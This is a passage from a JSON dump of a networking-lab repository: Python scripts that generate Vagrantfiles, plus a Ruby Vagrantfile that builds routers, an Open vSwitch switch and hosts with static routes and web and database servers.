run: \\\"always\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"Static Routig configuration Started\\\"\\n\")\nf.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n# we need to automate IP addressing according to the network/IP selection\nf.write(\"sudo route add -net 172.16.2.0 netmask 255.255.255.0 gw 172.16.4.10 dev eth2\\n\")\nf.write(\"sudo route add -net 172.16.8.0 netmask 255.255.252.0 gw 172.16.3.2 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.12.0 netmask 255.255.252.0 gw 172.16.3.2 dev eth1\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Router--1 is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"router1.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n# User can select the desired menmory for the machine. based on the application usage.\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"config.vm.define \\\"router-2\\\" do |router2|\\n\")\nf.write(\"router2.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"router2.vm.hostname = \\\"router-2\\\"\\n\")\nf.write(\"router2.vm.network \\\"private_network\\\", ip: \\\"172.16.2.10\\\", netmask: \\\"255.255.255.0\\\", virtualbox__intnet: \\\"broadcast_router-south-2\\\", auto_config: true\\n\")\nf.write(\"router2.vm.network \\\"private_network\\\", ip: \\\"172.16.4.10\\\", netmask: \\\"255.255.255.252\\\", virtualbox__intnet: \\\"broadcast_router-inter\\\", auto_config: true\\n\")\nf.write(\"router2.vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"Static Routig configuration Started\\\"\\n\")\nf.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo route add -net 172.16.3.0 netmask 255.255.255.240 gw 172.16.4.9 dev eth2\\n\")\nf.write(\"sudo route add -net 172.16.12.0 netmask 255.255.252.0 gw 172.16.4.9 dev eth2\\n\")\nf.write(\"sudo route add -net 172.16.8.0 netmask 255.255.252.0 gw 172.16.4.9 dev eth2\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Router--2 is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"router2.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n# User can select the desired menmory for the machine. we must allow them\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"config.vm.define \\\"switch\\\" do |switch|\\n\")\nf.write(\"switch.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"switch.vm.hostname = \\\"switch\\\"\\n\")\nf.write(\"switch.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-south-1\\\", auto_config: false\\n\")\nf.write(\"switch.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_host_a\\\", auto_config: false\\n\")\nf.write(\"switch.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_host_b\\\", auto_config: false\\n\")\nf.write(\"switch.vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"OpenVSwitch Installation is started\\\"\\n\")\nf.write(\"apt-get update\\n\")\nf.write(\"apt-get install -y tcpdump\\n\")\nf.write(\"apt-get install -y openvswitch-common openvswitch-switch apt-transport-https ca-certificates curl software-properties-common\\n\")\nf.write(\"echo \\\"OpenVSwitch Bridge Configuration Started\\\"\\n\")\nf.write(\"sudo ovs-vsctl add-br SW1\\n\")\nf.write(\"sudo ovs-vsctl add-br HA\\n\")\nf.write(\"sudo ovs-vsctl add-br HB\\n\")\nf.write(\"sudo ovs-vsctl add-port SW1 eth1\\n\")\nf.write(\"sudo ovs-vsctl add-port HA eth2\\n\")\nf.write(\"sudo ovs-vsctl add-port HB eth3\\n\")\nf.write(\"echo \\\"Bridge configuration END\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"switch.vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"OpenVSwitch Ip addressing is started\\\"\\n\")\nf.write(\"sudo ifconfig SW1 172.16.3.2/28\\n\")\nf.write(\"sudo ifconfig HA 172.16.8.10/22\\n\")\nf.write(\"sudo ifconfig HB 172.16.12.10/22\\n\")\nf.write(\"sudo ifconfig SW1 up\\n\")\nf.write(\"sudo ifconfig HA up\\n\")\nf.write(\"sudo ifconfig HB up\\n\")\nf.write(\"sudo ifconfig eth1 up\\n\")\nf.write(\"sudo ifconfig eth2 up\\n\")\nf.write(\"sudo ifconfig eth3 up\\n\")\nf.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo route add -net 172.16.4.8 netmask 255.255.255.252 gw 172.16.3.5 dev SW1\\n\")\nf.write(\"sudo route add -net 172.16.2.0 netmask 255.255.255.0 gw 172.16.3.5 dev SW1\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Switch is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"switch.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n# User can select the desired menmory for the machine. we must allow them\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\n\nf.write(\"config.vm.define \\\"host-a\\\" do |hosta|\\n\")\nf.write(\"hosta.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"hosta.vm.hostname = \\\"host-a\\\"\\n\")\nf.write(\"hosta.vm.network \\\"private_network\\\", ip: \\\"172.16.8.5\\\", netmask: \\\"255.255.252.0\\\", virtualbox__intnet: \\\"broadcast_host_a\\\", auto_config: true\\n\")\nf.write(\"#hosta.vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\nf.write(\"#echo \\\"Installation of Lynx Text-Based Browser to access the Web-Server via terminal on Host--A\\\"\\n\")\nf.write(\"#sudo apt-get update\\n\")\nf.write(\"#sudo apt-get install -y lynx\\n\")\nf.write(\"#echo \\\"Lynx-Browser is installed\\\"\\n\")\nf.write(\"#SHELL\\n\")\nf.write(\"hosta.vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"Static Routig configuration Started for Host--A\\\"\\n\")\nf.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo route add -net 172.16.3.0 netmask 255.255.255.240 gw 172.16.8.10 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.12.0 netmask 255.255.252.0 gw 172.16.8.10 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.4.8 netmask 255.255.255.252 gw 172.16.8.10 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.2.0 netmask 255.255.255.0 gw 172.16.8.10 dev eth1\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Host--A is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"hosta.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"config.vm.define \\\"host-b\\\" do |hostb|\\n\")\nf.write(\"hostb.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"hostb.vm.hostname = \\\"host-b\\\"\\n\")\nf.write(\"hostb.vm.network \\\"private_network\\\", ip: \\\"172.16.12.5\\\", netmask: \\\"255.255.252.0\\\", virtualbox__intnet: \\\"broadcast_host_b\\\", auto_config: true\\n\")\nf.write(\"#hostb.vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\nf.write(\"#echo \\\"Installation of Lynx Text-Based Browser to access the Web-Server via terminal on Host-B\\\"\\n\")\nf.write(\"#sudo apt-get update\\n\")\nf.write(\"#sudo apt-get install -y lynx\\n\")\nf.write(\"#echo \\\"Lynx-Browser is installed\\\"\\n\")\nf.write(\"#SHELL\\n\")\nf.write(\"hostb.vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"Static Routig configuration Started for Host--B\\\"\\n\")\nf.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo route add -net 172.16.3.0 netmask 255.255.255.240 gw 172.16.12.10 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.8.0 netmask 255.255.252.0 gw 172.16.12.10 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.4.8 netmask 255.255.255.252 gw 172.16.12.10 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.2.0 netmask 255.255.255.0 gw 172.16.12.10 dev eth1\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Host--B is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"hostb.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"config.vm.define \\\"host-c\\\" do |hostc|\\n\")\nf.write(\"hostc.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"hostc.vm.hostname = \\\"host-c\\\"\\n\")\nf.write(\"hostc.vm.network \\\"private_network\\\", ip: \\\"172.16.2.5\\\", netmask: \\\"255.255.255.0\\\", virtualbox__intnet: \\\"broadcast_router-south-2\\\", auto_config: true\\n\")\nf.write(\"hostc.vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"Static Routig configuration Started\\\"\\n\")\nf.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo route add -net 172.16.2.0 netmask 255.255.255.0 gw 172.16.2.10 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.3.0 netmask 255.255.255.240 gw 172.16.2.10 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.4.8 netmask 255.255.255.252 gw 172.16.2.10 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.8.0 netmask 255.255.252.0 gw 172.16.2.10 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.12.0 netmask 255.255.252.0 gw 172.16.2.10 dev eth1\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Host--C is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"hostc.vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"Installation of Web-Server\\\"\\n\")\nf.write(\"sudo apt-get update\\n\")\nf.write(\"sudo apt-get install -y apache2\\n\")\nf.write(\"echo \\\"Web-ServerServer is installed and Runing\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"hostc.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.close()\n#open and read the file after the appending:\nf = open(\"vagrant.txt\", \"r\")\nprint(f.read())\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n"
},
{
"alpha_fraction": 0.5957529544830322,
"alphanum_fraction": 0.7023177742958069,
"avg_line_length": 44.69822311401367,
"blob_id": "d6adf344fb50b3c086b09eb979153e733b51c0c8",
"content_id": "e7f78e83f8732d5d53c4f24663136630d798f0cf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": true,
"language": "Ruby",
"length_bytes": 7723,
"license_type": "permissive",
"max_line_length": 153,
"num_lines": 169,
"path": "/AllVagrantFiles/Routing_and_Switching/Vagrantfile",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "# -*- mode: ruby -*-\n# vi: set ft=ruby :\n\n# All Vagrant configuration is done below. The \"2\" in Vagrant.configure\n# configures the configuration version (we support older styles for\n# backwards compatibility). Please don't change it unless you know what\n# you're doing.\nVagrant.configure(\"2\") do |config|\n config.vm.box_check_update = true\n config.vm.provider \"virtualbox\" do |vb|\n vb.customize [\"modifyvm\", :id, \"--usb\", \"on\"]\n vb.customize [\"modifyvm\", :id, \"--usbehci\", \"off\"]\n vb.customize [\"modifyvm\", :id, \"--nicpromisc2\", \"allow-all\"]\n vb.customize [\"modifyvm\", :id, \"--nicpromisc3\", \"allow-all\"]\n vb.customize [\"modifyvm\", :id, \"--nicpromisc4\", \"allow-all\"]\n vb.customize [\"modifyvm\", :id, \"--nicpromisc5\", \"allow-all\"]\n vb.cpus = 1\n end\n config.vm.define \"router-1\" do |router1|\n router1.vm.box = \"bento/ubuntu-16.04\"\n router1.vm.hostname = \"router-1\"\n router1.vm.network \"private_network\", ip: \"172.16.3.5\", netmask: \"255.255.255.240\", virtualbox__intnet: \"broadcast_router-south-1\", auto_config: true\n router1.vm.network \"private_network\", ip: \"172.16.4.9\",netmask: \"255.255.255.252\", virtualbox__intnet: \"broadcast_router-inter\", auto_config: true\n router1.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n\techo \"Static Routig configuration Started\"\n\tsudo sysctl -w net.ipv4.ip_forward=1\n\tsudo route add -net 172.16.2.0 netmask 255.255.255.0 gw 172.16.4.10 dev eth2\n\tsudo route add -net 172.16.8.0 netmask 255.255.252.0 gw 172.16.3.2 dev eth1\n\tsudo route add -net 172.16.12.0 netmask 255.255.252.0 gw 172.16.3.2 dev eth1\n\techo \"Configuration END\"\n\techo \"Router--1 is ready to Use\"\t\n\tSHELL\n router1.vm.provider \"virtualbox\" do |vb|\n vb.memory = 1024\n end\n end\n config.vm.define \"router-2\" do |router2|\n router2.vm.box = \"bento/ubuntu-16.04\"\n router2.vm.hostname = \"router-2\"\n router2.vm.network \"private_network\", ip: \"172.16.2.10\", netmask: \"255.255.255.0\", virtualbox__intnet: \"broadcast_router-south-2\", auto_config: true\n router2.vm.network \"private_network\", ip: \"172.16.4.10\", netmask: \"255.255.255.252\", virtualbox__intnet: \"broadcast_router-inter\", auto_config: true\n router2.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n\techo \"Static Routig configuration Started\"\n\tsudo sysctl -w net.ipv4.ip_forward=1\n\tsudo route add -net 172.16.3.0 netmask 255.255.255.240 gw 172.16.4.9 dev eth2\n sudo route add -net 172.16.12.0 netmask 255.255.252.0 gw 172.16.4.9 dev eth2\n sudo route add -net 172.16.8.0 netmask 255.255.252.0 gw 172.16.4.9 dev eth2\n\techo \"Configuration END\"\n\techo \"Router--2 is ready to Use\"\t\n\tSHELL\n\trouter2.vm.provider \"virtualbox\" do |vb|\n vb.memory = 1024\n end\n end\n config.vm.define \"switch\" do |switch|\n switch.vm.box = \"bento/ubuntu-16.04\"\n switch.vm.hostname = \"switch\"\n switch.vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-south-1\", auto_config: false\n switch.vm.network \"private_network\", virtualbox__intnet: \"broadcast_host_a\", auto_config: false\n switch.vm.network \"private_network\", virtualbox__intnet: \"broadcast_host_b\", auto_config: false\n switch.vm.provision \"shell\", inline: <<-SHELL\n\techo \"OpenVSwitch Installation is started\"\n\tapt-get update\n\tapt-get install -y tcpdump\n\tapt-get install -y openvswitch-common openvswitch-switch apt-transport-https ca-certificates curl software-properties-common\n\techo \"OpenVSwitch Bridge Configuration Started\"\n\tsudo ovs-vsctl add-br SW1\n\tsudo ovs-vsctl add-br HA\n\tsudo ovs-vsctl add-br HB\n\tsudo ovs-vsctl add-port SW1 eth1\n\tsudo ovs-vsctl add-port HA eth2\n\tsudo ovs-vsctl add-port HB eth3\n\techo \"Bridge configuration END\"\n\tSHELL\n\tswitch.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n\techo \"OpenVSwitch Ip addressing is started\"\n\tsudo ifconfig SW1 172.16.3.2/28\n\tsudo ifconfig HA 172.16.8.10/22\n\tsudo ifconfig HB 172.16.12.10/22\n\tsudo ifconfig SW1 up\n\tsudo ifconfig HA up\n\tsudo ifconfig HB up\n\tsudo ifconfig eth1 up\n\tsudo ifconfig eth2 up\n\tsudo ifconfig eth3 up\n\tsudo sysctl -w net.ipv4.ip_forward=1\n\tsudo route add -net 172.16.4.8 netmask 255.255.255.252 gw 172.16.3.5 dev SW1\n\tsudo route add -net 172.16.2.0 netmask 255.255.255.0 gw 172.16.3.5 dev SW1\n\techo \"Configuration END\"\n\techo \"Switch is ready to Use\"\t\n\tSHELL\n\t switch.vm.provider \"virtualbox\" do |vb|\n vb.memory = 1024\n end\n end\n config.vm.define \"host-a\" do |hosta|\n hosta.vm.box = \"bento/ubuntu-16.04\"\n hosta.vm.hostname = \"host-a\"\n hosta.vm.network \"private_network\", ip: \"172.16.8.5\", netmask: \"255.255.252.0\", virtualbox__intnet: \"broadcast_host_a\", auto_config: true\n #hosta.vm.provision \"shell\", inline: <<-SHELL\n\t#echo \"Installation of Lynx Text-Based Browser to access the Web-Server via terminal on Host--A\"\n\t#sudo apt-get update\n\t#sudo apt-get install -y lynx\n\t#echo \"Lynx-Browser is installed\"\n\t#SHELL\t\t\n\thosta.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n\techo \"Static Routig configuration Started for Host--A\"\n\tsudo sysctl -w net.ipv4.ip_forward=1\n\tsudo route add -net 172.16.3.0 netmask 255.255.255.240 gw 172.16.8.10 dev eth1\n sudo route add -net 172.16.12.0 netmask 255.255.252.0 gw 172.16.8.10 dev eth1\n sudo route add -net 172.16.4.8 netmask 255.255.255.252 gw 172.16.8.10 dev eth1\n sudo route add -net 172.16.2.0 netmask 255.255.255.0 gw 172.16.8.10 dev eth1\n\techo \"Configuration END\"\n\techo \"Host--A is ready to Use\"\t\n\tSHELL\n\thosta.vm.provider \"virtualbox\" do |vb|\n vb.memory = 1024\n end\n end\n config.vm.define \"host-b\" do |hostb|\n hostb.vm.box = \"bento/ubuntu-16.04\"\n hostb.vm.hostname = \"host-b\"\n hostb.vm.network \"private_network\", ip: \"172.16.12.5\", netmask: \"255.255.252.0\", virtualbox__intnet: \"broadcast_host_b\", auto_config: true\n #hostb.vm.provision \"shell\", inline: <<-SHELL\n\t#echo \"Installation of Lynx Text-Based Browser to access the Web-Server via terminal on Host-B\"\n\t#sudo apt-get update\n\t#sudo apt-get install -y lynx\n\t#echo \"Lynx-Browser is installed\"\n\t#SHELL\t\n\thostb.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n\techo \"Static Routig configuration Started for Host--B\"\n\tsudo sysctl -w net.ipv4.ip_forward=1\n\tsudo route add -net 172.16.3.0 netmask 255.255.255.240 gw 172.16.12.10 dev eth1\n sudo route add -net 172.16.8.0 netmask 255.255.252.0 gw 172.16.12.10 dev eth1\n sudo route add -net 172.16.4.8 netmask 255.255.255.252 gw 172.16.12.10 dev eth1\n sudo route add -net 172.16.2.0 netmask 255.255.255.0 gw 172.16.12.10 dev eth1\n\techo \"Configuration END\"\n\techo \"Host--B is ready to Use\"\t\n\tSHELL\n\thostb.vm.provider \"virtualbox\" do |vb|\n vb.memory = 1024\n end\n end\n config.vm.define \"host-c\" do |hostc|\n hostc.vm.box = \"bento/ubuntu-16.04\"\n hostc.vm.hostname = \"host-c\"\n hostc.vm.network \"private_network\", ip: \"172.16.2.5\", netmask: \"255.255.255.0\", virtualbox__intnet: \"broadcast_router-south-2\", auto_config: true\n hostc.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n\techo \"Static Routig configuration Started\"\n\tsudo sysctl -w net.ipv4.ip_forward=1\n\tsudo route add -net 172.16.2.0 netmask 255.255.255.0 gw 172.16.2.10 dev eth1\n\tsudo route add -net 172.16.3.0 netmask 255.255.255.240 gw 172.16.2.10 dev eth1\n sudo route add -net 172.16.4.8 netmask 255.255.255.252 gw 172.16.2.10 dev eth1\n sudo route add -net 172.16.8.0 netmask 255.255.252.0 gw 172.16.2.10 dev eth1\n sudo route add -net 172.16.12.0 netmask 255.255.252.0 gw 172.16.2.10 dev eth1\n\techo \"Configuration END\"\n\techo \"Host--C is ready to Use\"\t\n\tSHELL\n\thostc.vm.provision \"shell\", inline: <<-SHELL\n\techo \"Installation of Web-Server\"\n\tsudo apt-get update\n\tsudo apt-get install -y apache2\n\techo \"Web-ServerServer is installed and Runing\"\n\tSHELL\n\t hostc.vm.provider \"virtualbox\" do |vb|\n vb.memory = 1024\n end\n end\nend\n"
},
{
"alpha_fraction": 0.5716111063957214,
"alphanum_fraction": 0.5875838398933411,
"avg_line_length": 38.28870391845703,
"blob_id": "66eb389e3a0345608e108fe7674e280c0fa57c8d",
"content_id": "dd3389775842240c3ba1f647795791b33e1104f1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9393,
"license_type": "permissive",
"max_line_length": 130,
"num_lines": 239,
"path": "/fromHTMLtoVagrant/VagrantTopologyWebServer.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import ipcalc \nimport yaml\n\n#this function writes the beginning of the VagrantFile\ndef BeginVagrantFile(f):\n f.write('# webserver and a host you can access the webserver from your browser with ip address 10.0.0.50 or from the host \\n')\n f.write('# -*- mode: ruby -*-\\n')\n f.write('# vi: set ft=ruby :\\n')\n\n f.write('Vagrant.configure(\"2\") do |config|\\n')\n f.write('# Configure web server machine\\n')\n\n\ndef writeWebServer(f, Web, edges):\n\n Id = Web[\"id\"]\n Name = Web[\"label\"]\n Os = Web[\"vm_image\"]\n Ip = Web[\"network_interfaces\"][0][\"ip_address\"]\n Ram = Web[\"ram\"]\n N_Cpus = Web[\"n_cpus\"]\n InterfaceName = Web[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference = Web[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth = 0\n DownlinkBandwidth = 0\n for edge in edges:\n if EdgeReference[0] == edge[\"from\"] and EdgeReference[1] == edge[\"to\"]:\n UplinkBandwidth = edge[\"bandwidth_up\"]\n DownlinkBandwidth = edge[\"bandwidth_down\"]\n CustumScript = Web[\"custom_script\"]\n \n\n f.write('config.vm.define \\\"' + Name + '\\\" do |' + Name + '|\\n')\n f.write(Name + '.vm.box = \\\"' + Os + '\\\"\\n')\n f.write(Name + '.vm.hostname = \\\"' + Name + '\\\"\\n')\n f.write(Name + '.vm.network \"private_network\", ip: \\\"' + Ip + '\\\" \\n')\n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + '.vm.provision \"shell\", inline: <<-SHELL \\n') \n f.write('echo \"Starting Provision: web server\"\\n')\n f.write('sudo apt-get update\\n')\n f.write('sudo apt-get install -y nginx\\n')\n f.write('touch /var/www/html/index.php\\n')\n f.write('sudo apt-get install -y php-fpm php-mysql\\n')\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n if UplinkBandwidth > 0 or DownlinkBandwidth > 0:\n f.write('cd wondershaper\\n')\n f.write('sudo ./wondershaper -a ' + InterfaceName)\n if DownlinkBandwidth > 0:\n f.write(' -d ' + str(DownlinkBandwidth))\n if UplinkBandwidth > 0:\n f.write(' -u ' + str(UplinkBandwidth))\n f.write('\\n')\n f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n\n #here there is the custum script\n f.write(CustumScript + \" \\n\")\n\n f.write('echo \"Provision web server complete\"\\n')\n f.write('SHELL\\n')\n f.write(Name + '.vm.provider \"virtualbox\" do |vb|\\n')\n f.write('vb.memory = ' + str(Ram) + '\\n')\n f.write('vb.cpus = ' + str(N_Cpus) + '\\n')\n f.write('end\\n')\n f.write('end\\n')\n\n\ndef writeDatabase(f, Db, edges):\n\n Id = Db[\"id\"]\n Name = Db[\"label\"]\n Os = Db[\"vm_image\"]\n Ip = Db[\"network_interfaces\"][0][\"ip_address\"]\n Ram = Db[\"ram\"]\n N_Cpus = Db[\"n_cpus\"]\n InterfaceName = Db[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference = Db[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth = 0\n DownlinkBandwidth = 0\n for edge in edges:\n if EdgeReference[0] == edge[\"from\"] and EdgeReference[1] == edge[\"to\"]:\n UplinkBandwidth = edge[\"bandwidth_up\"]\n DownlinkBandwidth = edge[\"bandwidth_down\"]\n CustumScript = Db[\"custom_script\"]\n\n f.write('# Configure database server machine\\n')\n f.write('config.vm.define \\\"' + Name + '\\\" do |' + Name + '|\\n')\n f.write(Name + '.vm.box = \\\"' + Os + '\\\"\\n')\n f.write(Name + '.vm.hostname = \\\"' + Name + '\\\"\\n')\n f.write(Name + '.vm.network \"private_network\", ip: \\\"' + Ip + '\\\" \\n')\n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + '.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\\n')\n f.write('sudo apt update\\n')\n f.write('sudo DEBIAN_FRONTEND=noninteractive apt-get -q -y install mysql-server\\n')\n f.write('echo \\\"WARNING: It is necessary to set the root password of mysql-server before using it!!!\\\"\\n')\n f.write('echo \\\"Example password configuration: mysqladmin -u root password mysecretpasswordgoeshere\\\"\\n')\n f.write('sleep 10\\n')\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n if UplinkBandwidth > 0 or DownlinkBandwidth > 0:\n f.write('cd wondershaper\\n')\n f.write('sudo ./wondershaper -a ' + InterfaceName)\n if DownlinkBandwidth > 0:\n f.write(' -d ' + str(DownlinkBandwidth))\n if UplinkBandwidth > 0:\n f.write(' -u ' + str(UplinkBandwidth))\n f.write('\\n')\n f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n #here there is the custum script\n f.write(CustumScript + \" \\n\")\n f.write('echo \"Provision database server complete\"\\n')\n f.write('SHELL\\n')\n f.write(Name + '.vm.provider \"virtualbox\" do |vb|\\n')\n f.write('vb.memory = ' + str(Ram) + '\\n')\n f.write('vb.cpus = ' + str(N_Cpus) + '\\n')\n f.write('end\\n')\n f.write('end\\n')\n \n\"\"\"\nweb1 = (1,{\n \"Id\" : 1,\n \"Name\":\"web1\",\n \"Os\": \"ubuntu/xenial64\",\n \"Ip\": \"10.0.0.50\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\"\n})\n\ndb1 = (2,{\n \"Id\" : 2,\n \"Name\":\"db1\",\n \"Os\": \"ubuntu/xenial64\",\n \"Ip\": \"10.0.0.51\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\"\n})\n\n\nMyNet = [web1,db1]\n\n\n\ndef find_between( s, first, last ):\n try:\n start = s.index( first ) + len( first )\n end = s.index( last, start )\n return s[start:end]\n except ValueError:\n return \"\"\n\ndef remap(newList):\n print(\"-------------------\")\n\n for item in newList:\n print(\"Looking at device \" + str(item))\n print(\"the TYPE is \" + item[\"type\"])\n\n print(\"remap of device \" + str(device[1][\"Id\"] + \" to device \" + str(item[\"id\"])))\n device[1][\"Name\"] = item[\"label\"]\n device[1][\"Ram\"] = item[\"ram\"]\n device[1][\"Os\"] = item[\"vm_image\"]\n device[1][\"N_Cpus\"] = item[\"n_cpus\"]\n\n device[1][\"Network\"][0][\"Ip\"] = item[\"network_interfaces\"][0][\"ip_address\"]\n device[1][\"Network\"][0][\"Netmask\"] = item[\"network_interfaces\"][0][\"netmask\"]\n device[1][\"Network\"][0][\"Interface\"] = item[\"network_interfaces\"][0][\"name_interface\"]\n #device[1][\"Network\"][0][\"Uplink_bandwidth\"] = \n\n\n if item[\"type\"] == \"web\" : \n\n for device in MyNet:\n if device[1][\"Id\"] is item[\"id\"]:\n print(\"remap of device \" + str(device[1][\"Id\"]) + \" to device \" + str(item[\"id\"]))\n device[1][\"Name\"] = item[\"label\"]\n device[1][\"Ram\"] = item[\"ram\"]\n device[1][\"Os\"] = item[\"vm_image\"]\n\n device[1][\"Network\"][0][\"Ip\"] = item[\"network_interfaces\"][0][\"ip_address\"]\n device[1][\"Network\"][0][\"Netmask\"] = item[\"network_interfaces\"][0][\"netmask\"]\n device[1][\"Network\"][0][\"Interface\"] = item[\"network_interfaces\"][0][\"name_interface\"]\n\n device[1][\"Network\"][1][\"Ip\"] = item[\"network_interfaces\"][1][\"ip_address\"]\n device[1][\"Network\"][1][\"Netmask\"] = item[\"network_interfaces\"][1][\"netmask\"]\n device[1][\"Network\"][1][\"Interface\"] = item[\"network_interfaces\"][1][\"name_interface\"]\n\n device[1][\"Network\"][2][\"Ip\"] = item[\"network_interfaces\"][2][\"ip_address\"]\n device[1][\"Network\"][2][\"Netmask\"] = item[\"network_interfaces\"][2][\"netmask\"]\n device[1][\"Network\"][2][\"Interface\"] = item[\"network_interfaces\"][2][\"name_interface\"] \n\n for item in newList:\n if item[\"type\"] == \"db\" : \n\n for device in MyNet:\n if device[1][\"Id\"] is item[\"id\"]:\n print(\"remap of device \" + str(device[1][\"Id\"]) + \" to device \" + str(item[\"id\"]))\n device[1][\"Name\"] = item[\"label\"]\n 